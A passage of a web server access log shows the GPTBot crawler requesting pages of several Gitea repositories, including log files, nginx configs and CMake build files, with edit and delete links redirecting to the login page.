+[17/Feb/2026:16:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:30:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:30:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:30:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:30:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:30:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:30:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:30:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:30:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:30:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:30:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:16:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:16:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:16:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:16:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:16:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:16:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 11175] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:16:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" +[17/Feb/2026:16:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14032] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10299] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11170] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10307] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:31:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:31:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:16:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10266] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33664] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10011] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 